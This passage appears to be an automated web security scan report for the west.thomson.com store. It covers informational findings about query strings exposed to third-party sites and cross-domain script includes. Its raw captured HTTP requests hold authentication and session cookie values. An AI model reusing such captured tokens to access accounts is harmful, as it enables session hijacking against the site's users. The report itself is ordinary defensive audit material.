_R3DisplayRight_ctl00_placeHolderTopNavigation_placeHolderContent_ctl00_R3DisplayRight_ctl00_placeHolderTopNavigation_placeHolderContent_ctl00_R3DisplayRight_Div_R3Placement --><script type='text/javascript' src='http://media.richrelevance.com/rrserver/js/0.4/p13n.js'> </script>...[SNIP]... <script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=wtcthomsonreuters"> ...[SNIP]... <a href="http://thomsonreuters.com" rel="nofollow" target="_blank"> .thomson.com/buttons/tr_logo_small.jpg'...[SNIP]... <img src="https://pixel.rubiconproject.com/tap.php?v=5487" id="AlvendaRemarkingTag" height="1px" width="1px" /> ...[SNIP]... <a href="http://www.omniture.com" title="Web Analytics"> <img src="https://thomson.112.2o7.net/b/ss/devthwest/1/H.20.3--NS/0" height="1" width="1" border="0" alt="" /> </a>...[SNIP]... <iframe src='http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3306&browse_products=160547' scrolling='no' width='1' height='1' marginheight='0' marginwidth='0' frameborder='0'> </iframe><!-- begin Marin Software Tracking Script --><script src='http://tracker.marinsm.com/tracker/787f8z6077.js' type='text/javascript'> </script>...[SNIP]... <img src="https://tracker.marinsm.com/tp?act=1&cid=787f8z6077&script=no" > ...[SNIP]...
4.3. http://west.thomson.com/store/secure/ShoppingBasket.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://west.thomson.com
Path:
/store/secure/ShoppingBasket.aspx
Issue detail
The page was loaded from a URL containing a query string:http://west.thomson.com/store/secure/ShoppingBasket.aspx?PromCode=571423 http://media.richrelevance.com/rrserver/js/0.4/p13n.js http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3306&abandon_products=162495 http://thomsonreuters.com/ http://tracker.marinsm.com/tracker/787f8z6077.js http://www.omniture.com/ https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js https://pixel.rubiconproject.com/tap.php?v=5487 https://s7.addthis.com/js/250/addthis_widget.js https://thomson.112.2o7.net/b/ss/devthwest/1/H.20.3--NS/0 https://tracker.marinsm.com/tp?act=1&cid=787f8z6077&script=no
Request
GET /store/secure/ShoppingBasket.aspx?PromCode=571423 HTTP/1.1,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;q=0.3=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; UserSiteIdIdentifier=; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1
Response
HTTP/1.1 200 OK767F208B345EAA979222AFB75B1D39D5072C8AC8163224D602E4EA0791659ECC40EAA04995AD2414A1EF63E920C2406A52D5A77C772B7312571F0AAC96B34372DB47CEF38803A8D2B7154B70F6215558C4BE194B8F6631FFDBEECF7D4256904225BA30EA921CF83C914FF8CF103200841FE605F66B636573E74A9FE11E39E665181B5E833711454838B5B5EDDAB8E52F237C0742B8087456FDD46A9875A0BD3BE7D68841EDA7A916AA72ACAB0B687055A7BCB2C0B64F0382E8FCCEA3EEE09697283C17C482DF2DE2D55F26A8BD1E5F9CC9D2F12F213FCC63F2AE7AFD0ECCE; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... .com/noexpire/combined.5.1.421.22.min.css' /><script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js'> </script><script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js'> </script>...[SNIP]... avigation_placeHolderContent_R3Display2_ctl00_placeHolderTopNavigation_placeHolderContent_R3Display2_ctl00_placeHolderTopNavigation_placeHolderContent_R3Display2_Div_R3Placement --><script type='text/javascript' src='http://media.richrelevance.com/rrserver/js/0.4/p13n.js'> </script>...[SNIP]... <script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=wtcthomsonreuters"> ...[SNIP]... <a href="http://thomsonreuters.com" rel="nofollow" target="_blank"> .thomson.com/buttons/tr_logo_small.jpg'...[SNIP]... <img src="https://pixel.rubiconproject.com/tap.php?v=5487" id="AlvendaRemarkingTag" height="1px" width="1px" /> ...[SNIP]... <a href="http://www.omniture.com" title="Web Analytics"> <img src="https://thomson.112.2o7.net/b/ss/devthwest/1/H.20.3--NS/0" height="1" width="1" border="0" alt="" /> </a>...[SNIP]... <iframe src='http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3306&abandon_products=162495' scrolling='no' width='1' height='1' marginheight='0' marginwidth='0' frameborder='0'> </iframe><!-- begin Marin Software Tracking Script --><script src='http://tracker.marinsm.com/tracker/787f8z6077.js' type='text/javascript'> </script>...[SNIP]... <img src="https://tracker.marinsm.com/tp?act=1&cid=787f8z6077&script=no" > ...[SNIP]...
4.4. http://west.thomson.com/store/secure/ShoppingBasket.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://west.thomson.com
Path:
/store/secure/ShoppingBasket.aspx
Issue detail
The page was loaded from a URL containing a query string:http://west.thomson.com/store/secure/ShoppingBasket.aspx?CartEventsAndParams=scAdd%3a+22061301%3b&CartContents=22061301%3b&PromCode=600582C43552&PromType=internal http://media.richrelevance.com/rrserver/js/0.4/p13n.js http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3306 http://thomsonreuters.com/ http://tracker.marinsm.com/tracker/787f8z6077.js http://www.omniture.com/ https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js https://pixel.rubiconproject.com/tap.php?v=5487 https://s7.addthis.com/js/250/addthis_widget.js https://thomson.112.2o7.net/b/ss/devthwest/1/H.20.3--NS/0 https://tracker.marinsm.com/tp?act=1&cid=787f8z6077&script=no
Request
GET /store/secure/ShoppingBasket.aspx?CartEventsAndParams=scAdd%3a+22061301%3b&CartContents=22061301%3b&PromCode=600582C43552&PromType=internal HTTP/1.1/default.aspx,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;q=0.3=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; s_cc=true; c_m2=1; c=undefined645229L86530undefined; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%5D; gpv_pn=Bankruptcy%20Exemption%20Manual%2C%202010%20ed.%20%28West%27s%26%23174%3B%20Bankruptcy%20Series%29; s_ppv=0; s_sq=%5B%5BB%5D%5D; UserSiteIdIdentifier=; .WTCAUTH=A2B8589473CF8FC8B84582EDCCA18DA921C9607FD66A72923489A9D520F1A72DC25C5881F2C4299AFEC4F650329ED4D92FDB7810CCF374D8369FE4C447608C1AFF940455236DD8C534F6DDF5D9575CABE558EAEAC107A418E22F703D34308342D11D90AB828F7BFA1961EF59A3B04676FA38F27153203526720F64014AAF6FD2BDBA490CBE6FD194CC05A5B2612403A475A4ECE05807201D3CAEBB3AA82896D25B6F9D8910E1764008977756F0D348920ACDA8AA90BA295110ACD3D7783F9EE8463371CE85B2638990312C407C601E69F97C32BD90BA2EC5DFD202985E1A9741F53BA94F
Response
HTTP/1.1 200 OKCB727B13EB90B8C98976EAD6E00A511FA67F9D5963EFE310C214A08DDC171F1385049DED9703E226ADDBECBD14CCB16D838A0B85D976FDE62983BB5CE86938F6641FEFBED3B18ECACE7E06D913FCDBD87B8BC58E01D96214B3FDDD74927ADA7E9FD593AA5CDFA68CA1978FCD5173D7C37282A5A1268AB89E95FDAF020FECDB864FD6F2EDBEB612F45CFD51AF93067C7D38025292F9C062B7E6B6FC432310E5D483E31C7BEC841EB7CFCFDB02C2D32CE5D9112178D315978B745C8355AE60082D92AAB43A9E1B125FED8B00C7D1C0192B477B1196049A5D9A666AFF52F5647; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... .com/noexpire/combined.5.1.421.22.min.css' /><script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js'> </script><script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js'> </script>...[SNIP]... avigation_placeHolderContent_R3Display2_ctl00_placeHolderTopNavigation_placeHolderContent_R3Display2_ctl00_placeHolderTopNavigation_placeHolderContent_R3Display2_Div_R3Placement --><script type='text/javascript' src='http://media.richrelevance.com/rrserver/js/0.4/p13n.js'> </script>...[SNIP]... <script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=wtcthomsonreuters"> ...[SNIP]... <a href="http://thomsonreuters.com" rel="nofollow" target="_blank"> .thomson.com/buttons/tr_logo_small.jpg'...[SNIP]... <img src="https://pixel.rubiconproject.com/tap.php?v=5487" id="AlvendaRemarkingTag" height="1px" width="1px" /> ...[SNIP]... <a href="http://www.omniture.com" title="Web Analytics"> <img src="https://thomson.112.2o7.net/b/ss/devthwest/1/H.20.3--NS/0" height="1" width="1" border="0" alt="" /> </a>...[SNIP]... <iframe src='http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3306' scrolling='no' width='1' height='1' marginheight='0' marginwidth='0' frameborder='0'> </iframe><!-- begin Marin Software Tracking Script --><script src='http://tracker.marinsm.com/tracker/787f8z6077.js' type='text/javascript'> </script>...[SNIP]... <img src="https://tracker.marinsm.com/tp?act=1&cid=787f8z6077&script=no" > ...[SNIP]...
4.5. http://west.thomson.com/support/contact-us/default.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://west.thomson.com
Path:
/support/contact-us/default.aspx
Issue detail
The page was loaded from a URL containing a query string:http://west.thomson.com/support/contact-us/default.aspx?PromCode=571422&FindingMethod=Navigation http://media.richrelevance.com/rrserver/js/0.4/p13n.js http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3306 http://thomsonreuters.com/ http://tracker.marinsm.com/tracker/787f8z6077.js http://www.omniture.com/ https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js https://bp.specificclick.net/?pixid=99064401 https://pixel.rubiconproject.com/tap.php?v=5487 https://s7.addthis.com/js/250/addthis_widget.js https://thomson.112.2o7.net/b/ss/devthwest/1/H.20.3--NS/0 https://tracker.marinsm.com/tp?act=1&cid=787f8z6077&script=no
Request
GET /support/contact-us/default.aspx?PromCode=571422&FindingMethod=Navigation HTTP/1.1,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;q=0.3=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; UserSiteIdIdentifier=
Response
HTTP/1.1 200 OK614D9A098CCCF9C0F29D3204EE9663C01D51E95CD9C592CDADB23A34786B30EBABB2390E7FEA51BBE62180DADFAF255CA8AB719509015068D68C8075FE6A23F095DF549827C80033255DA36E699502293674B6D668FCAE278ADD04138D880C6A3F40E0EDE98A77853F1F1B45413E1BE2A34BEE937DCCCDA776CE1ABCED0F26FB69F2755769BB874466A73E9A83CADFE53A93539D3BD0332C48F697F141BAC00E38E27C2938518BE9D5C9648C952E2BEF872DC06486975DC27BFACFEF36294DEAF331A255D5995D5F54EF39A2AFCD97B20A7D318572959553AEEC610017BD6; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml" >...[SNIP]... .com/noexpire/combined.5.1.421.22.min.css' /><script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js'> </script><script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js'> </script>...[SNIP]... <script type='text/javascript' src='http://media.richrelevance.com/rrserver/js/0.4/p13n.js'> </script>...[SNIP]... <script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=wtcthomsonreuters"> ...[SNIP]... <a href="http://thomsonreuters.com" rel="nofollow" target="_blank"> .thomson.com/buttons/tr_logo_small.jpg'...[SNIP]... <img src="https://bp.specificclick.net?pixid=99064401" id="AlvendaRemarkingTag2" height="0px" width="0px" /> <img src="https://pixel.rubiconproject.com/tap.php?v=5487" id="Img1" height="1px" width="1px" /> -align:center" id="ssurvey">...[SNIP]... <a href="http://www.omniture.com" title="Web Analytics"> <img src="https://thomson.112.2o7.net/b/ss/devthwest/1/H.20.3--NS/0" height="1" width="1" border="0" alt="" /> </a><iframe src='http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3306' scrolling='no' width='1' height='1' marginheight='0' marginwidth='0' frameborder='0'> </iframe><!-- begin Marin Software Tracking Script --><script src='http://tracker.marinsm.com/tracker/787f8z6077.js' type='text/javascript'> </script>...[SNIP]... <img src="https://tracker.marinsm.com/tp?act=1&cid=787f8z6077&script=no" > ...[SNIP]...
4.6. https://west.thomson.com/store/Promotions/EmailPreferences/Login.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://west.thomson.com
Path:
/store/Promotions/EmailPreferences/Login.aspx
Issue detail
The page was loaded from a URL containing a query string:https://west.thomson.com/store/Promotions/EmailPreferences/Login.aspx?Mstr=wtc&PromCode=571419&FindingMethod=Navigation https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js https://bp.specificclick.net/?pixid=99064401 https://media.richrelevance.com/rrserver/js/0.4/p13n.js https://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3306 https://pixel.rubiconproject.com/tap.php?v=5487 https://s7.addthis.com/js/250/addthis_widget.js https://thomson.112.2o7.net/b/ss/devthwest/1/H.20.3--NS/0 https://tracker.marinsm.com/tp?act=1&cid=787f8z6077&script=no https://tracker.marinsm.com/tracker/787f8z6077.js
Request
GET /store/Promotions/EmailPreferences/Login.aspx?Mstr=wtc&PromCode=571419&FindingMethod=Navigation HTTP/1.1,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;q=0.3=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; UserSiteIdIdentifier=
Response
HTTP/1.1 200 OK050051A95CC95A3B0888C03B9DBEF0A026D745D0656E2E3DE853394140B6D80EEE33684BAC22241C10BCEC46D800215998CBC7CB21197B52E754E19FAA6C1F1725A6249D03181F66A430ECE47F662E7EF119243B001BEA25F850311DCB9495BBDE849BAEAE38CFAF69EE6C71B979EC9A46B08E8C5B362E255E6FCD960E943F41886886E045C4EB97A5121632E495A2DE980E64EC33F053829F75AEDFBDE371B36DC072FBB362065481E66F8EFF61623D579526A71AC8DD9F30FF1BFAD99A5FA5D2AE551F509B6E57AC0127A7E82DD4063747DCDE458BCBBFA35D0CE53B82A; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... .thomson.com/noexpire/combined.5.1.421.22.min.css' /><script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js'> </script><script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js'> </script>...[SNIP]... <script type='text/javascript' src='https://media.richrelevance.com/rrserver/js/0.4/p13n.js'> </script>...[SNIP]... <script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=wtcthomsonreuters"> ...[SNIP]... <img src="https://bp.specificclick.net?pixid=99064401" id="AlvendaRemarkingTag2" height="0px" width="0px" /> <img src="https://pixel.rubiconproject.com/tap.php?v=5487" id="AlvendaRemarkingTag" height="1px" width="1px" /> ...[SNIP]... .com" title="Web Analytics"><img src="https://thomson.112.2o7.net/b/ss/devthwest/1/H.20.3--NS/0" height="1" width="1" border="0" alt="" /> </a><iframe src='https://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3306' scrolling='no' width='1' height='1' marginheight='0' marginwidth='0' frameborder='0'> </iframe><!-- begin Marin Software Tracking Script --><script src='https://tracker.marinsm.com/tracker/787f8z6077.js' type='text/javascript'> </script>...[SNIP]... <img src="https://tracker.marinsm.com/tp?act=1&cid=787f8z6077&script=no" > ...[SNIP]...
4.7. https://west.thomson.com/store/secure/ShippingInfo.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://west.thomson.com
Path:
/store/secure/ShippingInfo.aspx
Issue detail
The page was loaded from a URL containing a query string:https://west.thomson.com/store/secure/ShippingInfo.aspx?CartEventsAndParams=scAdd%3a+22061301%3b&CartContents=22061301%3b&PromCode=600582C43552&PromType=internal&Ctl00%24placeHolderTopNavigation%24WeststoreHeader%24cmbBucketCategory=adv_bkt_Books&Ctl00%24placeHolderTopNavigation%24WeststoreHeader%24txtSearch=keyword%2c+title%2c+author+or+ISBN&Ctl00%24placeHolderTopNavigation%24placeHolderContent%24basketItems%24ctl00%24txtQuantity=1&ChkCCMe=CC+Me&PageTitle=cart https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js https://bp.specificclick.net/?pixid=99064401 https://media.richrelevance.com/rrserver/js/0.4/p13n.js https://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3306 https://pixel.rubiconproject.com/tap.php?v=5487 https://s7.addthis.com/js/250/addthis_widget.js https://thomson.112.2o7.net/b/ss/devthwest/1/H.20.3--NS/0 https://tracker.marinsm.com/tp?act=1&cid=787f8z6077&script=no https://tracker.marinsm.com/tracker/787f8z6077.js
Request
GET /store/secure/ShippingInfo.aspx?CartEventsAndParams=scAdd%3a+22061301%3b&CartContents=22061301%3b&PromCode=600582C43552&PromType=internal&Ctl00%24placeHolderTopNavigation%24WeststoreHeader%24cmbBucketCategory=adv_bkt_Books&Ctl00%24placeHolderTopNavigation%24WeststoreHeader%24txtSearch=keyword%2c+title%2c+author+or+ISBN&Ctl00%24placeHolderTopNavigation%24placeHolderContent%24basketItems%24ctl00%24txtQuantity=1&ChkCCMe=CC+Me&PageTitle=cart HTTP/1.1/store/secure/ShoppingBasket.aspx?CartEventsAndParams=scAdd%3a+22061301%3b&CartContents=22061301%3b&PromCode=600582C43552&PromType=internal,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;q=0.3=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; SbasketVw=T; s_cc=true; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%5D; s_ppv=66; c_m2=1; c=undefined645229L86530undefined; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=Bankruptcy%20Exemption%20Manual%2C%202010%20ed.%20%28West%27s%26%23174%3B%20Bankruptcy%20Series%29; s_sq=thwest%3D%2526pid%253DBankruptcy%252520Exemption%252520Manual%25252C%2525202010%252520ed.%252520%252528West%252527s%252526%252523174%25253B%252520Bankruptcy%252520Series%252529%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BshowPopupBubble%252528%252527ctl00%252524placeHolderTopNavigation%252524placeHolderContent%252524ctl00%252524popu%2526oidt%253D2%2526ot%253DIMAGE; UserSiteIdIdentifier=; .WTCAUTH=9DFF38C2ED245A836B638A4FD2BB05048EFDFD2A3F3BC8DC4D0876357DAC06B163234E108A8F0DA6FFB919F8831205FF1893BF274F77770E9447A6CF6832F99911CAEA4F06343A555BDF7037EBDAD0392A3B821D6A252C115D9D10A1FD2B10DE395F8581D4BBE49B8B4EF6A088A00BE982BA5CBAAC1C23CD6D40E8E10C4A8CB90101D3CE531D7618D4A99EC6ED09D86A6A87BEB92C84EBB5541C5F4267CA16C317ED73CD9AD52E9BCFFCFA39E7A4F7561999EF701967F4FAEE3513AC9E115F783D6CA97286E2B3D06563DA39F267FA170B8C51C76EEB06DDD6F99A112D49B9ED48435EDE
Response
HTTP/1.1 200 OKBBE47C7EEF54F80B6D25789CF3B0DE11279B4960956BC8BB0E345579BADF326956E9721B67D71932107D3B64238D6EE6707D06C81817121C5953C161DDD49619F87B8AE2E421C792976F48CA556F7DB0C834EB3BE231FCF4A767E58A07AA7485840E793C3A65F7DEB1BA7BD4CA2E971C144356D50FC6DD68AFCB7569D943E22EBDA2359D2DDAFEEB65197678B43B591B46F28E9EA05EC9F8FE84A521E37C1F57160F4EE7D67E36501BABC3987B29619274E9EBC26949903E1FDAEC56DB8129C91303E8A4BE5A28D8839FB0A532C6B8B24419839BF14AB2C51AD3259D6DF7F; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... .thomson.com/noexpire/combined.5.1.421.22.min.css' /><script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js'> </script><script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js'> </script>...[SNIP]... <script type='text/javascript' src='https://media.richrelevance.com/rrserver/js/0.4/p13n.js'> </script>...[SNIP]... <script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=wtcthomsonreuters"> ...[SNIP]... <img src="https://bp.specificclick.net?pixid=99064401" id="AlvendaRemarkingTag2" height="0px" width="0px" /> <img src="https://pixel.rubiconproject.com/tap.php?v=5487" id="AlvendaRemarkingTag" height="1px" width="1px" /> ...[SNIP]... .com" title="Web Analytics"><img src="https://thomson.112.2o7.net/b/ss/devthwest/1/H.20.3--NS/0" height="1" width="1" border="0" alt="" /> </a><iframe src='https://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3306' scrolling='no' width='1' height='1' marginheight='0' marginwidth='0' frameborder='0'> </iframe><!-- begin Marin Software Tracking Script --><script src='https://tracker.marinsm.com/tracker/787f8z6077.js' type='text/javascript'> </script>...[SNIP]... <img src="https://tracker.marinsm.com/tp?act=1&cid=787f8z6077&script=no" > ...[SNIP]...
5. Cross-domain script include
previous
next
There are 9 instances of this issue:
Issue background
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
5.1. http://west.thomson.com/Error/500Error.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://west.thomson.com
Path:
/Error/500Error.aspx
Issue detail
The response dynamically includes the following scripts from other domains:http://media.richrelevance.com/rrserver/js/0.4/p13n.js http://tracker.marinsm.com/tracker/787f8z6077.js https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js https://s7.addthis.com/js/250/addthis_widget.js
Request
GET /Error/500Error.aspx?aspxerrorpath=/store/productdetail.aspx HTTP/1.1/productdetail/160547/12484463/productdetail.aspx?PromCode=645229L86530&PromType=internal,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;q=0.3=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; SbasketVw=T; s_cc=true; s_ppv=100; c_m2=1; c=undefined571419undefined; SC_LINKS=store%3Apromotions%3Aemailpreferences%3Alogin%5E%5EFree%20Ground%20Shipping%5E%5Estore%3Apromotions%3Aemailpreferences%3Alogin%20%7C%20Free%20Ground%20Shipping%5E%5E; s_ev48=%5B%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%2C%5B%27Referrers%27%2C%271303849270372%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849306606%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849781175%27%5D%5D; gpv_pn=store%3Apromotions%3Aemailpreferences%3Alogin; s_sq=thwest%3D%2526pid%253Dstore%25253Apromotions%25253Aemailpreferences%25253Alogin%2526pidt%253D1%2526oid%253Dhttps%25253A//west.thomson.com/support/customer-service/order-info.aspx%252523freeshipping%2526ot%253DA; UserSiteIdIdentifier=; .WTCAUTH=15EB1E2BD55FB642DEFDF69E45C933941D077548D9E77F5DFD86AFA9231864655A2D3B0A5DA53C12ECD77027BFA162DFE1C25838CD6ED0BA7EA11DF766E81FF9BE80932A802690C8D89CCD970BFE43D957372263E299FCB576D90CB191BE9C03BFA81FE18D6C1ABC185B6A95A9C3FE7C6D15760BFC5FE4F3A675D865307B7D2C00D2ADADD2A8C8C503C9A225B6F3DB06817479DC6714AA5F037A2AE2E40D4090AC151A6DF079A011C7D783412F0443C1E4CC8EA514A71C6F69B68B045D51D4F25992FD629E534853F1810AB486114ECE9F7CA350D4192436BFB8E836202640C7A7A9CEA9
Response
